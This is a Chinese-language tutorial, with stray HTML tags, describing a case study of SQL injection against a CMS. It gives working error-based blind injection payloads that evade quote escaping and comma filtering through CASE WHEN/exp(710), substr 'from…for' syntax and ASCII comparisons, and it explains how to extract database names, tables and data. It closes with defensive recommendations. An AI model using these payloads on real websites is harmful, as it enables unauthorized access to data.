SQL注入绕过技术实战教学文档<\/h1>

0x00 背景介绍<\/h2>
本案例描述了一个针对CMS系统的SQL注入漏洞发现与绕过过程。目标网站存在SQL注入漏洞，但开发了多种安全防护措施，包括：<\/p>
单引号转义（转换为\'<\/code>）<\/li>
逗号过滤<\/li>
引号限制<\/li>
<\/ul>
0x01 漏洞发现<\/h2>
初始发现<\/h3>

通过测试发现网站存在SQL注入漏洞<\/li>
报错信息中返回了原始SQL语句片段：in(\'\')<\/code><\/li>
推断原始SQL语句格式为：select * from xlz where id in ($id)<\/code><\/li>
<\/ul>
安全防护分析<\/h3>


引号处理<\/strong>：<\/p>

单引号、双引号、斜杠等特殊字符会被转义<\/li>
例如：'<\/code> → \'<\/code><\/li>
<\/ul>
<\/li>

错误表现<\/strong>：<\/p>

当注入特殊字符时，系统会直接报错<\/li>
<\/ul>
<\/li>
<\/ol>
0x02 注入绕过技术<\/h2>
1. 基础Payload构造<\/h3>
初始有效Payload格式：<\/p>
11)AND(CASE+WHEN(1=1)+THEN+1+ELSE+exp(710)+END
<\/code><\/pre>
2. 绕过逗号过滤<\/h3>
发现substr()<\/code>函数中的逗号被过滤，使用from for<\/code>语法替代：<\/p>
传统写法：<\/p>
substr(database<\/span>(),1<\/span>,1<\/span>)
<\/span><\/span><\/code><\/pre>绕过写法：<\/p>
substr(database<\/span>() from<\/span> 1<\/span> for<\/span> 1<\/span>)
<\/span><\/span><\/code><\/pre>3. 绕过引号限制<\/h3>
由于引号被转义，使用ASCII码函数替代字符串比较：<\/p>
传统写法：<\/p>
substr(database<\/span>(),1<\/span>,1<\/span>)=<\/span>'a'<\/span>
<\/span><\/span><\/code><\/pre>绕过写法：<\/p>
ascii(substr(database<\/span>() from<\/span> 1<\/span> for<\/span> 1<\/span>))=<\/span>97<\/span>
<\/span><\/span><\/code><\/pre>4. 完整Payload示例<\/h3>
获取数据库名的Payload：<\/p>
11)AND(CASE+WHEN(ascii(Substr(database()+from+1+for+1))=1)+THEN+1+ELSE+exp(710)+END
<\/code><\/pre>
0x03 注入流程<\/h2>


判断数据库名长度<\/strong>：<\/p>

使用二分法判断长度<\/li>
示例：判断长度为14<\/li>
<\/ul>
<\/li>

逐字符获取数据库名<\/strong>：<\/p>

通过修改from<\/code>和for<\/code>参数获取每个字符<\/li>
使用ASCII码比较确定具体字符<\/li>
<\/ul>
<\/li>

数据提取<\/strong>：<\/p>

同样的方法可应用于获取表名、字段名和数据<\/li>
只需修改database()<\/code>为相应查询语句<\/li>
<\/ul>
<\/li>
<\/ol>
0x04 防御建议<\/h2>
针对此类注入攻击，建议采取以下防护措施：<\/p>


输入验证<\/strong>：<\/p>

严格限制输入数据类型和格式<\/li>
使用白名单验证<\/li>
<\/ul>
<\/li>

参数化查询<\/strong>：<\/p>

使用预处理语句和参数化查询<\/li>
<\/ul>
<\/li>

最小权限原则<\/strong>：<\/p>

数据库账户使用最小必要权限<\/li>
<\/ul>
<\/li>

错误处理<\/strong>：<\/p>

自定义错误信息，避免泄露系统细节<\/li>
<\/ul>
<\/li>

多层防护<\/strong>：<\/p>

结合WAF和其他安全措施<\/li>
<\/ul>
<\/li>
<\/ol>
0x05 总结<\/h2>
本案例展示了如何绕过多种SQL注入防护措施：<\/p>

使用CASE WHEN<\/code>结构绕过基础过滤<\/li>
使用from for<\/code>语法替代被过滤的逗号<\/li>
使用ASCII码比较避免引号使用<\/li>
通过报错信息推断原始SQL结构<\/li>
<\/ol>
这种技术适用于存在类似防护措施的Web应用，强调了安全防护需要多层次、多角度的考虑。<\/p>